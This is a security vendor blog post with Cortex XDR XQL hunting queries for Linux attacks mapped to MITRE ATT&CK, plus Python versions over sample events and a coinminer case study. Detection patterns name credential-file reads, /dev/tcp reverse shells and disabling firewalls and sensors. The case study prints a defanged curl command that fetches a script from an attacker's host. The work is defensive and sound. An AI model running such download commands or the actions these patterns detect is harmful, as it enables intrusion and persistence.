# Linux Threat Hunting with Cortex XDR

By [Raj Nepali](https://www.paloaltonetworks.com/blog/author/raj-nepali/?ts=markdown "Posts by Raj Nepali"), Jul 11, 2023, 17 minutes

Tags: [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown), [Linux](https://www.paloaltonetworks.com/blog/tag/linux/?ts=markdown), [MITRE ATT&CK](https://www.paloaltonetworks.com/blog/tag/mitre-attck/?ts=markdown), [MTH](https://www.paloaltonetworks.com/blog/tag/mth/?ts=markdown), [Threat Hunting](https://www.paloaltonetworks.com/blog/tag/threat-hunting/?ts=markdown), [XQL](https://www.paloaltonetworks.com/blog/tag/xql/?ts=markdown)

## Executive Summary

The
cyber threat landscape is always changing, and attackers find new ways to compromise systems and achieve their objectives: espionage, ransomware, etc. With the proliferation of Linux operating systems, attackers are increasingly adapting their tactics, techniques, and procedures (TTPs) to target Linux systems. According to [W3Techs](https://w3techs.com/technologies/overview/operating_system), 81.2% of all websites known to them run on Linux servers. Also, due to their prevalence in critical infrastructure, cloud environments, and organizations, attackers are increasingly targeting Linux operating systems. The most popular types of [threats](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/a-look-at-linux-threats-risks-and-recommendations) on Linux are crypto-miners, malicious scripts, webshells, rootkits, and ransomware, while popular techniques are exploiting unpatched vulnerabilities, brute force attacks, deploying malware through compromised websites, etc.

In this post, we are going to take a look at some common ways to hunt for threats on Linux hosts using [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr) and [XQL](https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/Cortex-XDR-XQL-Language-Reference/Get-Started-with-XQL), following the MITRE [ATT&CK](https://attack.mitre.org/matrices/enterprise/linux/) framework as a reference. Please note that this post does not cover all possible techniques. In future posts, we will break down each tactic and dive deeper. Some queries return a high number of results; it is advised to use a good baseline for your environment.

## Hunting Queries

### Execution ([TA0002](https://attack.mitre.org/tactics/TA0002/))

Attackers will most often have limited privileges upon initial access. They will try to execute additional programs for several purposes, for example reconnaissance, privilege escalation, discovery, etc.
Generally, attackers will download their payload to the host in world-writable locations such as /tmp and /var/tmp and execute it from there. The downloaded payload/file can be a Linux executable or a script. We can hunt for this activity via the query below:

```
// Description: Executions from /tmp or /var/tmp paths
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = PROCESS and event_sub_type = PROCESS_START
| filter action_process_image_path ~= "^\/tmp.*?$" or action_process_image_path ~= "^\/var\/tmp.*?$"
// Some potential filters on causality_actor_process_image_path: /bin/bash, /usr/sbin/crond
| fields agent_hostname, actor_effective_username, actor_process_image_path, action_process_image_path, action_process_image_command_line, action_process_image_sha256, causality_actor_process_image_path, causality_actor_process_command_line
```

Additionally, we can also hunt for file download activity at these paths:

```
// Description: File Download via curl or wget (T1105)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW OR event_sub_type = ENUM.FILE_WRITE) and (actor_process_image_name contains "curl" or actor_process_image_name contains "wget")
// action_file_type => 18: Not Evaluated
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, action_file_path, action_file_extension, action_file_type, action_file_size, causality_actor_process_image_path, causality_actor_process_command_line
```

Another popular way for malware to get onto the host is via trojanized applications executed by users. It is very common for users to download files from the internet and execute them on the host.
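The two queries above can be exercised offline. The Python below is an added example, not code from the post or from Cortex XDR: it applies the same regex and `contains` filters to a handful of constructed rows shaped like `xdr_data` events (the field names are the ones the queries return; the host names, paths and the causality allowlist are made up) and shows why a baseline matters: the cron-spawned script under /tmp drops out once its parent is baselined, while `ls -la /tmp` never matches because the regex runs on the image path, not the command line.

```python
import re

# XQL "~=" is a regex match. These are the patterns from the "Executions from
# /tmp or /var/tmp paths" query (the "\/" escapes are not needed in Python),
# applied case-insensitively because the queries set case_sensitive = false.
TMP_EXEC_RE = re.compile(r"^/tmp.*?$|^/var/tmp.*?$", re.IGNORECASE)

# Downloader names from the "File Download via curl or wget" query.
DOWNLOADERS = ("curl", "wget")

# Constructed baseline: causality parents that legitimately launch things from
# /tmp in this (made-up) environment. The post names /bin/bash and
# /usr/sbin/crond as candidate filters; only crond is baselined here.
BASELINE_CAUSALITY = frozenset({"/usr/sbin/crond"})

# Constructed sample rows shaped like xdr_data events; field names follow the queries.
EVENTS = [
    {"agent_os_type": "AGENT_OS_LINUX", "event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "agent_hostname": "web-01", "actor_effective_username": "www-data",
     "action_process_image_path": "/var/tmp/.update", "action_process_image_command_line": "/var/tmp/.update",
     "causality_actor_process_image_path": "/bin/bash"},
    {"agent_os_type": "AGENT_OS_LINUX", "event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "agent_hostname": "web-01", "actor_effective_username": "root",
     "action_process_image_path": "/tmp/backup-rotate.sh", "action_process_image_command_line": "/tmp/backup-rotate.sh",
     "causality_actor_process_image_path": "/usr/sbin/crond"},
    # "/tmp" appears only as an argument; the regex runs on the image path, so this must not match.
    {"agent_os_type": "AGENT_OS_LINUX", "event_type": "PROCESS", "event_sub_type": "PROCESS_START",
     "agent_hostname": "web-01", "actor_effective_username": "root",
     "action_process_image_path": "/usr/bin/ls", "action_process_image_command_line": "ls -la /tmp",
     "causality_actor_process_image_path": "/bin/bash"},
    {"agent_os_type": "AGENT_OS_LINUX", "event_type": "FILE", "event_sub_type": "FILE_CREATE_NEW",
     "agent_hostname": "web-01", "actor_effective_username": "www-data",
     "actor_process_image_name": "curl", "action_file_path": "/var/tmp/x.sh"},
    {"agent_os_type": "AGENT_OS_LINUX", "event_type": "FILE", "event_sub_type": "FILE_WRITE",
     "agent_hostname": "build-02", "actor_effective_username": "ci",
     "actor_process_image_name": "wget", "action_file_path": "/home/ci/pkg.tar.gz"},
    # Windows host: dropped by the agent_os_type filter even though curl wrote a file.
    {"agent_os_type": "AGENT_OS_WINDOWS", "event_type": "FILE", "event_sub_type": "FILE_WRITE",
     "agent_hostname": "win-03", "actor_effective_username": "alice",
     "actor_process_image_name": "curl.exe", "action_file_path": "C:\\Users\\alice\\x.ps1"},
]


def _is_linux(ev):
    return ev.get("agent_os_type") == "AGENT_OS_LINUX"


def hunt_tmp_executions(events, baseline=BASELINE_CAUSALITY):
    """Process starts whose image lives under /tmp or /var/tmp, minus baselined parents.

    Returns (hostname, user, image path) tuples in event order.
    """
    hits = []
    for ev in events:
        if not _is_linux(ev) or ev.get("event_type") != "PROCESS" or ev.get("event_sub_type") != "PROCESS_START":
            continue
        if not TMP_EXEC_RE.match(ev.get("action_process_image_path", "")):
            continue
        if ev.get("causality_actor_process_image_path") in baseline:
            continue  # known-good parent for this environment
        hits.append((ev["agent_hostname"], ev["actor_effective_username"], ev["action_process_image_path"]))
    return hits


def hunt_downloads(events, watch_dirs=("/tmp/", "/var/tmp/")):
    """File creates/writes by curl or wget.

    Returns (hostname, downloader, path, landed_in_watched_dir) tuples; the last
    element is the "at these paths" check that the XQL query leaves to the analyst.
    """
    hits = []
    for ev in events:
        if not _is_linux(ev) or ev.get("event_type") != "FILE":
            continue
        if ev.get("event_sub_type") not in ("FILE_CREATE_NEW", "FILE_WRITE"):
            continue
        name = ev.get("actor_process_image_name", "").lower()
        if not any(tool in name for tool in DOWNLOADERS):
            continue
        path = ev["action_file_path"]
        hits.append((ev["agent_hostname"], name, path, path.startswith(watch_dirs)))
    return hits


if __name__ == "__main__":
    for hit in hunt_tmp_executions(EVENTS):
        print("exec from tmp:", hit)
    for hit in hunt_downloads(EVENTS):
        print("download:", hit)
```

Calling `hunt_tmp_executions(EVENTS, baseline=frozenset())` returns the cron-spawned script as well, which is the raw query result; the default baseline is what turns it into something an analyst can review.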
It is extremely important to baseline process executions on the hosts in order to detect outliers.

```
// Description: Apps installed on the host via dpkg -i or double click on the .deb file
// When the app is installed via double click, we see two events
// --fsys-tarfile: Extracts the filesystem tree data from a binary package
// --control: Extracts the control information from archive into the specified directory
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = PROCESS and event_sub_type = PROCESS_START and (action_process_image_command_line contains "dpkg -i" or action_process_image_command_line contains "dpkg-deb") and action_process_image_command_line contains ".deb"
// Reduce some noise
| filter (action_process_image_command_line not contains """fonts-dejavu""") and (causality_actor_process_command_line not contains "apt.systemd.daily")
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, action_process_image_path, action_process_image_command_line, causality_actor_process_command_line
```

Additionally, execution can occur via scheduled tasks/jobs ([T1053](https://attack.mitre.org/techniques/T1053/)), which we will cover in the Persistence section.

### Persistence ([TA0003](https://attack.mitre.org/tactics/TA0003/))

Once the attacker is on the host, the obvious next step is to establish persistence: to maintain access to the system across reboots, password changes, detections, etc. This can be achieved in several ways. The most obvious one is to create a user account on the host.
```
// Description: Add User
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter action_process_image_command_line contains "useradd"
| fields agent_hostname, actor_effective_username, actor_process_image_path, causality_actor_process_image_path, os_actor_process_image_path, action_process_image_path, action_process_image_command_line
```

Another common technique we see is adding the attacker's public key to authorized_keys on the host when SSH is accessible. This allows the attackers to SSH into the host without a password.

```
// Description: SSH Persistence via authorized_keys
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW or event_sub_type = ENUM.FILE_WRITE) and action_file_path contains "authorized_keys"
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, action_file_path
```

RC scripts can also be used to establish persistence on the host, although this requires root permissions.
```
// Description: Persistence via Boot Logon Initialization scripts/RC Scripts (T1037.004)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW or event_sub_type = ENUM.FILE_WRITE) and (action_file_path ~= "\/etc\/rc.(local|common)")
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, action_file_path
```

```
// Description: Persistence via Unix Shell Configuration Modification (T1546.004)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW or event_sub_type = ENUM.FILE_WRITE) and (action_file_path ~= "\/etc\/profile" or action_file_path ~= "\/home\/.*\/\.(bash.*|profile)")
// Reduce some noise
| filter action_file_path not contains "bash_history"
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, action_file_path
```

Another popular technique is to schedule tasks on the hosts. This can be achieved via "at" jobs, cron jobs, or systemd timers. An at job executes the program once at the specified time, while cron jobs are recurring jobs at the specified intervals.
```
// Description: Persistence via "at"
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START and (causality_actor_process_image_path contains "atd")
| fields agent_hostname, actor_effective_username, causality_actor_process_image_path, actor_process_image_path, action_process_image_path, action_process_image_command_line
```

```
// Description: CRON Job Add
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = FILE //and (event_sub_type = FILE_WRITE OR event_sub_type = FILE_CREATE_NEW)
| filter action_file_path contains "/etc/cron" OR action_file_path contains "/var/spool/cron"
| fields _time, agent_hostname, actor_effective_username, action_file_path, actor_process_image_name, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, causality_actor_process_command_line, event_type, event_sub_type
```

```
// Description: Persistence via CRON, Processes started by CRON job
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = PROCESS and event_sub_type = PROCESS_START
// Causality is usually cron and crond, additionally you can also look for anacron
| filter causality_actor_process_image_name contains "cron"
| fields _time, agent_hostname, actor_effective_username, action_process_image_command_line, actor_process_image_path, actor_process_command_line, causality_actor_process_image_name, causality_actor_process_command_line
| dedup action_process_image_command_line
```

Finally, web shells are a popular technique for establishing persistence on web servers. A web shell is a small program that can be invoked through the web server.
```
// Description: WebShells write on the host
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW OR event_sub_type = ENUM.FILE_WRITE) and action_file_path contains "www" and action_file_extension in ("php", "html")
| filter actor_effective_username contains "www-data" and actor_process_image_path contains "apache"
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_command_line, action_process_image_command_line, action_file_path
```

```
// Description: Web Shell Activity
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS
| filter causality_actor_process_image_path contains "apache"
// Filter for shell activities
| filter actor_process_image_path contains "/bin/bash" OR actor_process_image_path contains "/bin/sh"
// more filtering can be done using actor_effective_username contains "www-data"
| filter (actor_effective_username contains """www-data""")
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, causality_actor_process_command_line, action_process_image_path, action_process_image_command_line
```

### Privilege Escalation ([TA0004](https://attack.mitre.org/tactics/TA0004/))

Attackers will look for ways to elevate privileges once they have a foothold in the network. There are many techniques to achieve this. Setuid and setgid allow a program to run in the context of its file owner or group rather than that of the invoking user. Attackers can find and abuse programs with the setuid or setgid bit set to execute them in a privileged context.
```
// Description: Search for setuid and setgid files (T1548.001)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS
// Either bit is of interest on its own: "-perm -4000" (setuid) or "-perm -2000" (setgid)
| filter action_process_image_path contains "find" and action_process_image_command_line contains "-perm" and (action_process_image_command_line contains "-4000" or action_process_image_command_line contains "-2000")
| fields _time, agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, causality_actor_process_command_line, action_process_image_path, action_process_image_command_line
```

Attackers can also abuse systemd services for privilege escalation.

```
// Description: Systemd service/timer creation (T1543.002)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = FILE and (event_sub_type = FILE_WRITE OR event_sub_type = FILE_CREATE_NEW) and (action_file_extension = "service" OR action_file_extension = "timer")
| filter action_file_path contains "/etc/systemd/" OR action_file_path contains "/usr/lib/systemd" OR action_file_path contains "config/systemd/"
| fields _time, agent_hostname, actor_effective_username, action_file_path, actor_process_image_name, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, causality_actor_process_command_line
| dedup agent_hostname, action_file_path
```

NOTE: For privilege escalation via scheduled tasks, please refer to the Persistence section.

### Defense Evasion ([TA0005](https://attack.mitre.org/tactics/TA0005/))

Attackers will use different techniques to avoid detection by security controls or defenders.
```
// Description: Directory/File Permission Modification (T1222.002)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS and (action_process_image_command_line contains "chmod" or action_process_image_command_line contains "chown" or action_process_image_command_line contains "chattr")
| fields agent_hostname, causality_actor_process_image_path, actor_process_image_path, action_process_image_path, action_process_image_command_line
```

Additionally, attackers can hide files and directories to evade detection.

```
// Description: Hide File or a Directory (T1564.001)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and (event_sub_type = ENUM.FILE_CREATE_NEW OR event_sub_type = ENUM.FILE_WRITE or event_sub_type = ENUM.FILE_DIR_CREATE OR event_sub_type = ENUM.FILE_DIR_WRITE)
| alter dir_name = regextract(action_file_path, "\/(\.\w+)$")
| filter (action_file_name ~= "^\.\w+" or dir_name ~= "^\.\w+")
| fields agent_hostname, action_file_path, action_file_name, dir_name, event_type, event_sub_type, action_file_mode, action_file_size, action_file_type
// Additionally we can use common paths where these might run from: /tmp, /var/tmp
```

Another obvious technique to evade detection is disabling security tools/services on the host.
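Before the security-tools query, a closer look at the hidden-file hunt above. Its `regextract` pattern `\/(\.\w+)$` only captures a dot-component at the very end of the path, so it sees the hidden file itself, or the hidden directory on a FILE_DIR_CREATE event, but not an ordinary-looking file written inside a directory that is already hidden. The Python below is an added example, not code from the post or from Cortex XDR: it reproduces the query's logic over constructed FILE events (field names from the query; paths and the baseline are made up), then generalizes it to any hidden path component with a baseline of dot-names that are hidden by convention.

```python
import re

# Same patterns as the "Hide File or a Directory" XQL query:
# regextract(action_file_path, "\/(\.\w+)$") captures a trailing dot-component,
# and action_file_name / dir_name are then tested against "^\.\w+".
TRAILING_HIDDEN_RE = re.compile(r"/(\.\w+)$")
HIDDEN_NAME_RE = re.compile(r"^\.\w+")

# Sub-types the query looks at (creates and writes of files and directories).
FILE_SUBTYPES = {"FILE_CREATE_NEW", "FILE_WRITE", "FILE_DIR_CREATE", "FILE_DIR_WRITE"}

# Constructed baseline of dot-names that are hidden by convention and would
# otherwise dominate the results; tune it to your own environment.
BASELINE_HIDDEN = frozenset({".bash_history", ".cache", ".config", ".viminfo"})

# Constructed sample rows shaped like xdr_data FILE events.
EVENTS = [
    {"event_sub_type": "FILE_CREATE_NEW", "action_file_path": "/var/tmp/.systemd", "action_file_name": ".systemd"},
    {"event_sub_type": "FILE_DIR_CREATE", "action_file_path": "/var/tmp/.x", "action_file_name": ".x"},
    # Ordinary name dropped inside a hidden directory: invisible to the trailing-component regex.
    {"event_sub_type": "FILE_WRITE", "action_file_path": "/var/tmp/.sys/run.sh", "action_file_name": "run.sh"},
    {"event_sub_type": "FILE_WRITE", "action_file_path": "/home/alice/.bash_history", "action_file_name": ".bash_history"},
    {"event_sub_type": "FILE_WRITE", "action_file_path": "/etc/passwd", "action_file_name": "passwd"},
    # FILE_OPEN is not one of the create/write sub-types the query filters on.
    {"event_sub_type": "FILE_OPEN", "action_file_path": "/home/bob/.note", "action_file_name": ".note"},
]


def query_style_hits(events):
    """Reproduce the XQL query: hidden file name, or hidden trailing path component."""
    hits = []
    for ev in events:
        if ev["event_sub_type"] not in FILE_SUBTYPES:
            continue
        m = TRAILING_HIDDEN_RE.search(ev["action_file_path"])
        dir_name = m.group(1) if m else ""
        if HIDDEN_NAME_RE.match(ev["action_file_name"]) or HIDDEN_NAME_RE.match(dir_name):
            hits.append(ev["action_file_path"])
    return hits


def hidden_components(path):
    """Every dot-component in the path ('.' and '..' are directory references, not hidden names)."""
    return [c for c in path.split("/") if c.startswith(".") and c not in (".", "..")]


def hunt_hidden(events, baseline=BASELINE_HIDDEN):
    """Generalized hunt: any create/write touching a hidden component that is not baselined.

    Returns (path, [suspicious hidden components]) tuples in event order.
    """
    hits = []
    for ev in events:
        if ev["event_sub_type"] not in FILE_SUBTYPES:
            continue
        suspicious = [c for c in hidden_components(ev["action_file_path"]) if c not in baseline]
        if suspicious:
            hits.append((ev["action_file_path"], suspicious))
    return hits


if __name__ == "__main__":
    print("query-style:", query_style_hits(EVENTS))
    print("generalized:", hunt_hidden(EVENTS))
```

Run side by side, the query-style pass reports `.bash_history` (noise) and misses `/var/tmp/.sys/run.sh`, while the generalized pass does the opposite; the difference is the baseline plus checking every component rather than only the last one.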
```
// Description: Disable Security Tools (T1562.001)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = PROCESS and event_sub_type = PROCESS_START and
(lowercase(action_process_image_command_line) contains "stop" or lowercase(action_process_image_command_line) contains "disable" or lowercase(action_process_image_command_line) contains "off") and
(lowercase(action_process_image_command_line) contains "iptables" or
lowercase(action_process_image_command_line) contains "ip6tables" or
lowercase(action_process_image_command_line) contains "firewalld" or
lowercase(action_process_image_command_line) contains "falcon-sensor" or
lowercase(action_process_image_command_line) ~= "setenforce\s*0" or
lowercase(action_process_image_command_line) contains "ufw " or
lowercase(action_process_image_command_line) contains " ufw" or
lowercase(action_process_image_command_line) contains "rsyslog")
| fields agent_hostname, actor_process_image_name, actor_process_command_line, actor_effective_username, action_process_image_name, action_process_image_path, action_process_image_command_line
```

### Credential Access ([TA0006](https://attack.mitre.org/tactics/TA0006/))

During attacks, attackers are interested in acquiring credentials for later use: to escalate privileges, move laterally, etc. One of the easy ways is to look for files that potentially store credentials.
```
// Description: Password files search (T1552.001)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS and action_process_image_path contains "find" and (action_process_image_command_line contains "password" or action_process_image_command_line contains "login")
| fields _time, agent_hostname, causality_actor_process_image_path, causality_actor_process_command_line, actor_process_image_path, actor_process_command_line, action_process_image_path, action_process_image_command_line
```

```
// Description: Processes Reading Credential Files
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.FILE and event_sub_type = ENUM.FILE_OPEN and (action_file_path = "*/etc/shadow*" or action_file_path = "*/etc/login*" or action_file_path = "*/proc/*/maps/*" or action_file_path = "*/etc/login.defs*")
| fields agent_hostname, causality_actor_process_image_path, actor_process_image_path, actor_process_command_line, action_file_path, event_id
```

Another approach to acquiring credentials is to dump process memory and look for credentials in the memory dumps.

```
// Description: Hunt Memory Dumping (T1003.007)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = FILE and (action_file_path ~= "^\/proc\/\d+\/maps" or action_file_path ~= "^\/proc\/\d+\/mem")
// Usually these are done via dd, also watch out for gcore, gdb as well
| filter actor_process_image_path contains "dd"
| fields agent_hostname, causality_actor_process_image_path, actor_process_image_path, actor_process_command_line, action_process_image_path, action_file_path, event_type, event_sub_type
```

Private keys stored on the host can be very valuable to attackers.
```
// Description: Private Keys Enumeration (T1552.004)
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS and action_process_image_path contains "find" and (action_process_image_command_line contains "pem" or
action_process_image_command_line contains "pfx" or
action_process_image_command_line contains "key" or
action_process_image_command_line contains "pgp" or
action_process_image_command_line contains "gpg" or
action_process_image_command_line contains "ppk" or
action_process_image_command_line contains "p12" or
action_process_image_command_line contains "cer" or
action_process_image_command_line contains "p7b" or
action_process_image_command_line contains "asc")
| fields _time, agent_hostname, causality_actor_process_image_path, causality_actor_process_command_line, actor_process_image_path, actor_process_command_line, action_process_image_path, action_process_image_command_line
```

### Discovery ([TA0007](https://attack.mitre.org/tactics/TA0007/))

Discovery is an important part of the attack lifecycle: it gives the attacker information on the systems and their security posture, which in turn helps them plan how to continue the attack.
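The query that follows does more than keyword matching: it groups matching process starts by the parent (hostname, user, actor image path, actor command line), counts the distinct child image names, and reports parents at three or more. As an added example, not code from the post or from Cortex XDR, here is that aggregation in Python over constructed rows; the field names and keyword list are taken from the query, while the hosts, users and commands are made up. It also surfaces a tuning caveat: `contains "ps"` is a substring match, so a command line such as `rsync -a /srv/apps /backup` counts as a recon hit.

```python
from collections import defaultdict

# Keywords from the "General Reconnaissance/Discovery commands" query, matched
# as case-insensitive substrings, exactly as XQL "contains" behaves with case_sensitive = false.
RECON_KEYWORDS = ("whoami", "history", "passwd", "uname", "ps", "groups", "smbclient", "systemctl")
THRESHOLD = 3  # distinct recon commands per parent before reporting (the query's configurable >= 3)


def _ev(host, user, actor_path, actor_cmd, image_name, cmdline):
    """Build a constructed PROCESS_START row with the fields the query groups and counts on."""
    return {"agent_hostname": host, "actor_effective_username": user,
            "actor_process_image_path": actor_path, "actor_process_command_line": actor_cmd,
            "action_process_image_name": image_name, "action_process_image_command_line": cmdline}


# Constructed sample rows. The actor is the parent that spawned each command.
EVENTS = [
    _ev("web-01", "www-data", "/bin/bash", "bash -i", "whoami", "whoami"),
    _ev("web-01", "www-data", "/bin/bash", "bash -i", "uname", "uname -a"),
    _ev("web-01", "www-data", "/bin/bash", "bash -i", "cat", "cat /etc/passwd"),
    _ev("web-01", "www-data", "/bin/bash", "bash -i", "ps", "ps aux"),
    _ev("web-01", "www-data", "/bin/bash", "bash -i", "id", "id"),  # no keyword: not counted
    _ev("db-02", "root", "/usr/bin/python3", "python3 /opt/monitor.py", "ps", "ps -ef"),
    _ev("db-02", "root", "/usr/bin/python3", "python3 /opt/monitor.py", "systemctl", "systemctl status postgresql"),
    _ev("db-02", "postgres", "/bin/bash", "bash", "rsync", "rsync -a /srv/apps /backup"),  # "apps" contains "ps"
]


def is_recon(cmdline):
    """True when the command line contains any recon keyword (substring, case-insensitive)."""
    low = cmdline.lower()
    return any(keyword in low for keyword in RECON_KEYWORDS)


def aggregate(events):
    """Mirror the query's 'comp ... by' clause: distinct child image names per parent."""
    per_actor = defaultdict(set)
    for ev in events:
        if not is_recon(ev["action_process_image_command_line"]):
            continue
        key = (ev["agent_hostname"], ev["actor_effective_username"],
               ev["actor_process_image_path"], ev["actor_process_command_line"])
        per_actor[key].add(ev["action_process_image_name"].lower())
    return per_actor


def hunt_recon(events, threshold=THRESHOLD):
    """Parents that launched at least `threshold` distinct recon commands, most active first.

    Returns (group key, sorted command names) tuples.
    """
    results = [(key, sorted(names)) for key, names in aggregate(events).items() if len(names) >= threshold]
    results.sort(key=lambda item: (-len(item[1]), item[0]))
    return results


if __name__ == "__main__":
    for key, commands in hunt_recon(EVENTS):
        print(key, "->", commands)
```

With the default threshold only the interactive shell on web-01 is reported; lowering it to 2 also pulls in the monitoring script on db-02, and the `rsync` false positive is visible in `aggregate()` even though it never reaches the threshold on its own.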
```
// Description: General Reconnaissance/Discovery commands
config case_sensitive = false timeframe=1d
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = PROCESS and event_sub_type = PROCESS_START
| filter action_process_image_command_line contains "whoami" or
action_process_image_command_line contains "history" or
action_process_image_command_line contains "passwd" or
action_process_image_command_line contains "uname" or
action_process_image_command_line contains "ps" or
action_process_image_command_line contains "groups" or
action_process_image_command_line contains "smbclient" or
action_process_image_command_line contains "systemctl"
| fields agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line, causality_actor_process_image_path, os_actor_process_image_path, action_process_image_name, action_process_image_path, action_process_image_command_line
| comp count_distinct(action_process_image_name) as distinct_count_commands_observed, values(action_process_image_name) as commands_observed by agent_hostname, actor_effective_username, actor_process_image_path, actor_process_command_line
// Filter for processes that trigger 3 or more recon commands (configurable)
| filter distinct_count_commands_observed >= 3
```

### Command and Control ([TA0011](https://attack.mitre.org/tactics/TA0011/))

Command and control (C2) allows attackers to remotely control the host. Please note that there are several ways to spawn a reverse shell; the example below only shows one such technique. For more on C2 hunting, please refer to [this post](https://www.paloaltonetworks.com/blog/security-operations/from-the-hunter-diaries-detecting-c2-servers/).
```
// Description: Hunting Reverse Shells
config case_sensitive = false
| dataset = xdr_data
| filter agent_os_type = AGENT_OS_LINUX
| filter event_type = ENUM.PROCESS and (actor_process_command_line contains "/dev/tcp" OR action_process_image_command_line contains "/dev/tcp/")
| fields agent_hostname, actor_effective_username, causality_actor_process_image_path, actor_process_image_path, actor_process_command_line, action_process_image_command_line
```

## Case Study: Mine your own business

The Unit 42 Managed Threat Hunting team recently identified a suspicious binary in one customer environment executing from the /var/tmp directory. Upon further investigation, we identified this binary as a coinminer. The causality for this binary was a cron job set up on the host via crontab. The cron job was added via an SSH session from an internal unmanaged host.

![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2023/07/word-image-297986-1-1.png)

The cron job was set to execute the binaries (/var/tmp/.systemd, /var/tmp/.update) dropped via the SSH session, and to download and execute further payloads via curl from an external host, both at a regular interval and upon reboot:

```
curl -fsSL http[:]//pw[.]pwndns[.]pw/root.sh
```

## Summary

Due to the increasing popularity of Linux operating systems, attackers are adapting their TTPs to target Linux systems. We are seeing an uptick in different threat actors targeting Linux operating systems. The most popular threats include ransomware, custom malware, rootkits, exploits against the operating system, and living-off-the-land techniques. It is expected that attackers will continue targeting these systems. Reducing the attack surface and hardening the systems will make the attackers' lives difficult; however, many organizations lack the expertise to properly harden these systems. There are several hardening guides organizations can leverage to properly harden these devices.
Additionally, in this post we provided several "low-hanging" hunting queries organizations can use to catch attackers.

## About Unit 42 Managed Services

Unit 42 Managed Threat Hunting is a powerful service that empowers organizations to stay ahead of the ever-evolving threat landscape. Led by the renowned Unit 42 threat intelligence team, this service is designed to identify hidden attacks that would otherwise go undetected. Our team of expert threat hunters uses a combination of human expertise, big data analytics and comprehensive threat intelligence to surface malicious tactics, techniques, and procedures hiding in plain sight. This cutting-edge service is fueled by data collected and retained in the Cortex Data Lake, ensuring that organizations have access to the most comprehensive and accurate information available. With Unit 42 Managed Threat Hunting, organizations can take proactive steps to protect their assets and stay one step ahead of cybercriminals. For more information, visit [https://www.paloaltonetworks.com/unit42/respond/managed-threat-hunting](https://www.paloaltonetworks.com/unit42/respond/managed-threat-hunting).
